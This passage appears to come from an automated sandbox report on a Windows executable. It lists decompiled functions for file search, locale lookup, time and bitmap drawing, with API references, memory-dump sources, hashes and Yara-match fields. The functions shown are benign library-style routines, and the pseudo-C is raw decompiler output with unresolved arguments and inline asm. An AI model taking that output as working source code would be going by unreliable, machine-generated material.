                                                                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                                                                                          • Instruction ID: 9a129490767a9822db482bfa393921b2fcf1aa7a937d9a2231ce8cb683432473
                                                                                                                          • Opcode Fuzzy Hash: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                                                                                          • Instruction Fuzzy Hash: 9A310C30D04608EFDB11EBA6C886A9EB7B5EF48304F5045FAA405B73D1D778AF45CA58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040EA04, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(?), ref: 0040EA0C
                                                                                                                          • FindClose.KERNEL32(00000000,?), ref: 0040EA16
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                                                                                          • Instruction ID: 6a2226afb0a8b14f7d31ab3cf4cdd30a4af029b65c76461fbe821aedbeee1211
                                                                                                                          • Opcode Fuzzy Hash: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                                                                                          • Instruction Fuzzy Hash: 78C08C64E081402BC80023B6CC0282B3008FA84348F840926759BF22C2D93E89248A6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403CB4, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E00403CB4(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x403d1a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004031F4( &_v20, 7,  &_v15);
				E0040269C(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00403D21);
				return E00403094( &_v20);
			}








                                                                                                                          0x00403cbd
                                                                                                                          0x00403cc2
                                                                                                                          0x00403cc3
                                                                                                                          0x00403cc8
                                                                                                                          0x00403ccb
                                                                                                                          0x00403cda
                                                                                                                          0x00403cea
                                                                                                                          0x00403cf5
                                                                                                                          0x00403d00
                                                                                                                          0x00403d00
                                                                                                                          0x00403d06
                                                                                                                          0x00403d09
                                                                                                                          0x00403d0c
                                                                                                                          0x00403d19

                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2299586839-0
                                                                                                                          • Opcode ID: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                                                                                          • Instruction ID: 6d3425cb13dc4e10e5c99e835ecbf0d9b5a709cf75aacf138b47c3a7ed30a7d1
                                                                                                                          • Opcode Fuzzy Hash: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                                                                                          • Instruction Fuzzy Hash: DDF0C830904209AFEB04DFA2CC42ADEF77EFB88714F10887AA110675C0EBB82B04C648
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040D74C, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2299586839-0
                                                                                                                          • Opcode ID: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                                                                                          • Instruction ID: 7765dcfaf0ac3467b05695104e180fa3b916594c574afae56f7b81e2f936b299
                                                                                                                          • Opcode Fuzzy Hash: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                                                                                          • Instruction Fuzzy Hash: F4F06D31A04309EFEB15DFA1CC51ADEF779FB84714F508576A510675C1D7B82604C758
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040F270, Relevance: 1.5, APIs: 1, Instructions: 10timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 481472006-0
                                                                                                                          • Opcode ID: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                                                                                          • Instruction ID: 4be9079c8441ee73391fb420eaf64c5b500e0d105d5474b8364197a0399cc555
                                                                                                                          • Opcode Fuzzy Hash: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                                                                                          • Instruction Fuzzy Hash: 23C08C3980450652C600BB64DC0284AB6A8AEC0200F8089BEA4CCD21E1EB39D31DC3C7
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040627C, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E0040627C(void* __eax, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* _t59;
				struct HBITMAP__* _t62;
				void* _t68;
				void* _t71;
				int _t72;
				int _t75;
				int _t80;
				void* _t81;
				void* _t85;
				void* _t94;
				void* _t100;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t119;
				signed int _t121;
				struct HBITMAP__* _t124;
				struct HBITMAP__* _t125;
				RECT* _t126;
				void* _t128;

				_t128 = __eflags;
				_push(__eax);
				E00406144(__eax);
				_pop(_t59);
				if(_t128 != 0) {
					asm("pushad");
					_t100 = _t59;
					 *((intOrPtr*)(_t100 + 0x34))();
					 *((intOrPtr*)(_t100 + 0x28)) = 0;
					 *((intOrPtr*)(_t100 + 0x56)) = 0;
					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
					asm("jecxz 0x13");
					_t62 =  *(_t100 + 0x3d);
					_t121 =  *(_t62 + 4);
					_t119 =  *(_t62 + 8);
					if(_t119 < 0) {
						_t119 =  ~_t119;
					}
					_push(0);
					L00404108();
					_push(_t62);
					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
					if( *((char*)(_t100 + 0x3c)) != 1) {
						asm("jecxz 0xfffffff2");
						_t124 = 0;
						_t110 =  *(_t100 + 0x18);
						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
						__eflags =  *(_t100 + 0x49) - 5;
						if( *(_t100 + 0x49) == 5) {
							E0040600C(_t67, _t110);
						}
						_pop(_t68);
						_push(_t68);
						_push(E00406268(_t68) *  *(_t100 + 0x18));
						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
						_push(_t71);
						_push(0);
						_push(_v12);
						_push(_t71);
						_t72 =  *(_t100 + 0x18);
						__eflags = _t72 - _t119;
						if(__eflags > 0) {
							_t72 = _t119;
						}
						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
						_t113 =  *(_t100 + 0x18);
						__eflags = _t113 - _t119;
						if(_t113 > _t119) {
							_t113 = _t119;
						}
						__eflags = _t75 - _t113;
						if(__eflags != 0) {
							_pop(_t81);
							E00402468(_t81);
							_push(0);
							_push(0);
							_push(0);
							_push(_t126);
							_push(0);
							_push(_v40);
							_push(_v36);
							L00404110();
							_t121 = _t121 ^ 0xffffffff;
							_t124 = 0;
							_t85 = SelectObject(_v60, 0);
							_t113 = _v68;
							__eflags = 0;
							E00406094(_t100, 0, _v68, 0, 0);
							SelectObject(_v72, _t85);
						}
						E00406024(_t100, _t100, _t113, __eflags);
						_pop( *_t47);
						_pop( *_t48);
						_pop( *_t49);
						 *(_t100 + 0x20) = _t124;
						__eflags = _t121;
						 *(_t100 + 0x72) = 0;
						if(_t121 < 0) {
							_t52 = _t100 + 0x72;
							 *_t52 =  *(_t100 + 0x72) + 1;
							__eflags =  *_t52;
						}
					} else {
						_push(0);
						L00404178();
						_push(_t62);
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(_t62);
						L00404100();
						_t125 = _t62;
						L00404190();
						_t116 = 0;
						_push(_t116);
						_push(SelectObject(_t116, _t125));
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(0);
						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
						_t117 = _t126;
						FillRect(_v44, _t126, _t94);
						DeleteObject(_t94);
						asm("jecxz 0x24");
						SelectObject(_v60, 0);
						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
						E00406024(_t100, _t100, _t117, _t130);
						 *(_t100 + 0x20) = _t125;
					}
					asm("jecxz 0xa");
					_pop(_t114);
					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
					_t80 = DeleteDC(_t119);
					asm("popad");
					return _t80;
				}
				return _t59;
			}






























                                                                                                                          0x0040627c
                                                                                                                          0x0040627c
                                                                                                                          0x0040627d
                                                                                                                          0x00406282
                                                                                                                          0x00406283
                                                                                                                          0x00406289
                                                                                                                          0x0040628a
                                                                                                                          0x0040628c
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x004062a3
                                                                                                                          0x004062a5
                                                                                                                          0x004062a8
                                                                                                                          0x004062ab
                                                                                                                          0x004062b0
                                                                                                                          0x004062b2
                                                                                                                          0x004062b2
                                                                                                                          0x004062d5
                                                                                                                          0x004062d7
                                                                                                                          0x004062dc
                                                                                                                          0x004062dd
                                                                                                                          0x004062e1
                                                                                                                          0x00406397
                                                                                                                          0x00406399
                                                                                                                          0x0040639e
                                                                                                                          0x004063a6
                                                                                                                          0x004063a7
                                                                                                                          0x004063ab
                                                                                                                          0x004063ad
                                                                                                                          0x004063ad
                                                                                                                          0x004063b2
                                                                                                                          0x004063b3
                                                                                                                          0x004063be
                                                                                                                          0x004063bf
                                                                                                                          0x004063c4
                                                                                                                          0x004063c5
                                                                                                                          0x004063c7
                                                                                                                          0x004063cb
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d1
                                                                                                                          0x004063d3
                                                                                                                          0x004063d3
                                                                                                                          0x004063e4
                                                                                                                          0x004063e9
                                                                                                                          0x004063ec
                                                                                                                          0x004063ee
                                                                                                                          0x004063f0
                                                                                                                          0x004063f0
                                                                                                                          0x004063f2
                                                                                                                          0x004063f4
                                                                                                                          0x004063f6
                                                                                                                          0x004063f7
                                                                                                                          0x004063fe
                                                                                                                          0x00406405
                                                                                                                          0x00406406
                                                                                                                          0x00406407
                                                                                                                          0x00406408
                                                                                                                          0x0040640a
                                                                                                                          0x0040640b
                                                                                                                          0x0040640f
                                                                                                                          0x00406414
                                                                                                                          0x00406417
                                                                                                                          0x0040641d
                                                                                                                          0x00406423
                                                                                                                          0x00406427
                                                                                                                          0x0040642c
                                                                                                                          0x00406435
                                                                                                                          0x00406435
                                                                                                                          0x0040643c
                                                                                                                          0x00406441
                                                                                                                          0x00406444
                                                                                                                          0x00406447
                                                                                                                          0x0040644a
                                                                                                                          0x0040644d
                                                                                                                          0x0040644f
                                                                                                                          0x00406453
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x004062e7
                                                                                                                          0x004062e7
                                                                                                                          0x004062e9
                                                                                                                          0x004062ee
                                                                                                                          0x004062ef
                                                                                                                          0x004062f2
                                                                                                                          0x004062f5
                                                                                                                          0x004062f6
                                                                                                                          0x004062fb
                                                                                                                          0x004062fe
                                                                                                                          0x00406303
                                                                                                                          0x00406304
                                                                                                                          0x0040630c
                                                                                                                          0x0040630d
                                                                                                                          0x00406310
                                                                                                                          0x00406313
                                                                                                                          0x00406320
                                                                                                                          0x00406325
                                                                                                                          0x0040632e
                                                                                                                          0x00406333
                                                                                                                          0x0040633e
                                                                                                                          0x00406344
                                                                                                                          0x0040635b
                                                                                                                          0x00406378
                                                                                                                          0x0040637d
                                                                                                                          0x0040637d
                                                                                                                          0x0040645b
                                                                                                                          0x0040645d
                                                                                                                          0x00406463
                                                                                                                          0x00406465
                                                                                                                          0x0040646a
                                                                                                                          0x00000000
                                                                                                                          0x0040646a
                                                                                                                          0x0040646b

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018), ref: 004062C2
                                                                                                                          • 73BBA590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
                                                                                                                          • 73BBAC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
                                                                                                                          • 73BBA520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
                                                                                                                          • 73BBB380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
                                                                                                                          • SelectObject.GDI32(00000000), ref: 00406307
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00406320
                                                                                                                          • FillRect.USER32 ref: 0040632E
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406333
                                                                                                                          • SelectObject.GDI32(?), ref: 00406344
                                                                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00406371
                                                                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
                                                                                                                          • 73BBA7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040641D
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00406435
                                                                                                                          • DeleteDC.GDI32 ref: 00406465
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2504469172-0
                                                                                                                          • Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                                                                          • Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
                                                                                                                          • Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                                                                          • Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040FD14, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018), ref: 0040FD5A
                                                                                                                          • 73BBA590.GDI32(00000000), ref: 0040FD6F
                                                                                                                          • 73BBAC50.USER32(00000000,00000000,00000000), ref: 0040FD81
                                                                                                                          • 73BBA520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
                                                                                                                          • 73BBB380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
                                                                                                                          • SelectObject.GDI32(00000000), ref: 0040FD9F
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
                                                                                                                          • FillRect.USER32 ref: 0040FDC6
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040FDCB
                                                                                                                          • SelectObject.GDI32(?), ref: 0040FDDC
                                                                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
                                                                                                                          • SelectObject.GDI32(?), ref: 0040FE09
                                                                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
                                                                                                                          • 73BBA7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FEB5
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FECD
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0040FEFD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2504469172-0
                                                                                                                          • Opcode ID: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                                                                          • Instruction ID: 8bfa987d25260d88ee3329e71298cc77801f48d1f8f03ee880f1b7424a85638e
                                                                                                                          • Opcode Fuzzy Hash: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                                                                          • Instruction Fuzzy Hash: A051D4716042006FDB14AF65CC82F2B3B69EF84314F1148BEB905BB6D7D639EC088B98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406218, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* __ebx;
				void* _t64;
				void* _t66;
				struct HBITMAP__* _t69;
				void* _t75;
				void* _t78;
				int _t79;
				int _t82;
				int _t87;
				void* _t88;
				void* _t92;
				void* _t101;
				void* _t108;
				void* _t111;
				void* _t113;
				void* _t115;
				void* _t133;
				struct HDC__* _t135;
				struct HDC__* _t137;
				void* _t139;
				int* _t140;
				struct HDC__* _t142;
				signed int _t144;
				struct HBITMAP__* _t147;
				struct HBITMAP__* _t148;
				RECT* _t149;
				void* _t151;

				_t151 = __eflags;
				_t113 = __eax;
				_t64 = E00406144(__eax);
				if(_t151 == 0) {
					L7:
					if(__eflags != 0) {
						E00406144(_t64);
						_t66 = _t64;
						if(__eflags != 0) {
							asm("pushad");
							_t115 = _t66;
							 *((intOrPtr*)(_t115 + 0x34))();
							 *((intOrPtr*)(_t115 + 0x28)) = 0;
							 *((intOrPtr*)(_t115 + 0x56)) = 0;
							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
							asm("jecxz 0x13");
							_t69 =  *(_t115 + 0x3d);
							_t144 =  *(_t69 + 4);
							_t142 =  *(_t69 + 8);
							__eflags = _t142;
							if(_t142 < 0) {
								_t142 =  ~_t142;
							}
							_push(0);
							L00404108();
							_push(_t69);
							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
							if( *((char*)(_t115 + 0x3c)) != 1) {
								asm("jecxz 0xfffffff2");
								_t147 = 0;
								_t129 =  *(_t115 + 0x18);
								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
								__eflags =  *(_t115 + 0x49) - 5;
								if( *(_t115 + 0x49) == 5) {
									E0040600C(_t74, _t129);
								}
								_pop(_t75);
								_push(_t75);
								_push(E00406268(_t75) *  *(_t115 + 0x18));
								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
								_push(_t78);
								_push(0);
								_push(_v12);
								_push(_t78);
								_t79 =  *(_t115 + 0x18);
								__eflags = _t79 - _t142;
								if(__eflags > 0) {
									_t79 = _t142;
								}
								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
								_t132 =  *(_t115 + 0x18);
								__eflags = _t132 - _t142;
								if(_t132 > _t142) {
									_t132 = _t142;
								}
								__eflags = _t82 - _t132;
								if(__eflags != 0) {
									_pop(_t88);
									E00402468(_t88);
									_push(0);
									_push(0);
									_push(0);
									_push(_t149);
									_push(0);
									_push(_v40);
									_push(_v36);
									L00404110();
									_t144 = _t144 ^ 0xffffffff;
									_t147 = 0;
									_t92 = SelectObject(_v60, 0);
									_t132 = _v68;
									__eflags = 0;
									E00406094(_t115, 0, _v68, 0, 0);
									SelectObject(_v72, _t92);
								}
								E00406024(_t115, _t115, _t132, __eflags);
								_pop( *_t51);
								_pop( *_t52);
								_pop( *_t53);
								 *(_t115 + 0x20) = _t147;
								__eflags = _t144;
								 *(_t115 + 0x72) = 0;
								if(_t144 < 0) {
									_t56 = _t115 + 0x72;
									 *_t56 =  &( *(_t115 + 0x72)->i);
									__eflags =  *_t56;
								}
								goto L25;
							} else {
								_push(0);
								L00404178();
								_push(_t69);
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(_t69);
								L00404100();
								_t148 = _t69;
								L00404190();
								_t135 = 0;
								_push(_t135);
								_push(SelectObject(_t135, _t148));
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(0);
								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
								_t136 = _t149;
								FillRect(_v44, _t149, _t101);
								DeleteObject(_t101);
								asm("jecxz 0x24");
								SelectObject(_v60, 0);
								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
								E00406024(_t115, _t115, _t136, __eflags);
								 *(_t115 + 0x20) = _t148;
								L25:
								asm("jecxz 0xa");
								_pop(_t133);
								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
								_t87 = DeleteDC(_t142);
								asm("popad");
								return _t87;
							}
						}
						return _t66;
					} else {
						return _t64;
					}
				} else {
					_push(__edx);
					_t64 = E0040648C(_t113, __edx);
					_pop(_t137);
					if(_t64 == _t137) {
						goto L7;
					} else {
						_t108 = _t113;
						if(_t137 != 0) {
							 *(_t113 + 0x49) = _t137;
							__eflags = _t137 - 5;
							if(_t137 == 5) {
								_t137 = _t137 - 1;
								__eflags = _t137;
							}
							L27();
							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
							_t139 = _t137;
							__eflags = _t111 - _t139;
							_t64 = _t113;
							goto L7;
						} else {
							_t140 =  &(_t137->i);
							if(_t140 !=  *(_t108 + 0x3c)) {
								 *(_t108 + 0x3c) = _t140;
								L9();
								return _t108;
							}
							return _t108;
						}
					}
				}
			}






































                                                                                                                          0x00406218
                                                                                                                          0x00406219
                                                                                                                          0x0040621b
                                                                                                                          0x00406220
                                                                                                                          0x0040625d
                                                                                                                          0x0040625e
                                                                                                                          0x0040627d
                                                                                                                          0x00406282
                                                                                                                          0x00406283
                                                                                                                          0x00406289
                                                                                                                          0x0040628a
                                                                                                                          0x0040628c
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x004062a3
                                                                                                                          0x004062a5
                                                                                                                          0x004062a8
                                                                                                                          0x004062ab
                                                                                                                          0x004062ae
                                                                                                                          0x004062b0
                                                                                                                          0x004062b2
                                                                                                                          0x004062b2
                                                                                                                          0x004062d5
                                                                                                                          0x004062d7
                                                                                                                          0x004062dc
                                                                                                                          0x004062dd
                                                                                                                          0x004062e1
                                                                                                                          0x00406397
                                                                                                                          0x00406399
                                                                                                                          0x0040639e
                                                                                                                          0x004063a6
                                                                                                                          0x004063a7
                                                                                                                          0x004063ab
                                                                                                                          0x004063ad
                                                                                                                          0x004063ad
                                                                                                                          0x004063b2
                                                                                                                          0x004063b3
                                                                                                                          0x004063be
                                                                                                                          0x004063bf
                                                                                                                          0x004063c4
                                                                                                                          0x004063c5
                                                                                                                          0x004063c7
                                                                                                                          0x004063cb
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d1
                                                                                                                          0x004063d3
                                                                                                                          0x004063d3
                                                                                                                          0x004063e4
                                                                                                                          0x004063e9
                                                                                                                          0x004063ec
                                                                                                                          0x004063ee
                                                                                                                          0x004063f0
                                                                                                                          0x004063f0
                                                                                                                          0x004063f2
                                                                                                                          0x004063f4
                                                                                                                          0x004063f6
                                                                                                                          0x004063f7
                                                                                                                          0x004063fe
                                                                                                                          0x00406405
                                                                                                                          0x00406406
                                                                                                                          0x00406407
                                                                                                                          0x00406408
                                                                                                                          0x0040640a
                                                                                                                          0x0040640b
                                                                                                                          0x0040640f
                                                                                                                          0x00406414
                                                                                                                          0x00406417
                                                                                                                          0x0040641d
                                                                                                                          0x00406423
                                                                                                                          0x00406427
                                                                                                                          0x0040642c
                                                                                                                          0x00406435
                                                                                                                          0x00406435
                                                                                                                          0x0040643c
                                                                                                                          0x00406441
                                                                                                                          0x00406444
                                                                                                                          0x00406447
                                                                                                                          0x0040644a
                                                                                                                          0x0040644d
                                                                                                                          0x0040644f
                                                                                                                          0x00406453
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00000000
                                                                                                                          0x004062e7
                                                                                                                          0x004062e7
                                                                                                                          0x004062e9
                                                                                                                          0x004062ee
                                                                                                                          0x004062ef
                                                                                                                          0x004062f2
                                                                                                                          0x004062f5
                                                                                                                          0x004062f6
                                                                                                                          0x004062fb
                                                                                                                          0x004062fe
                                                                                                                          0x00406303
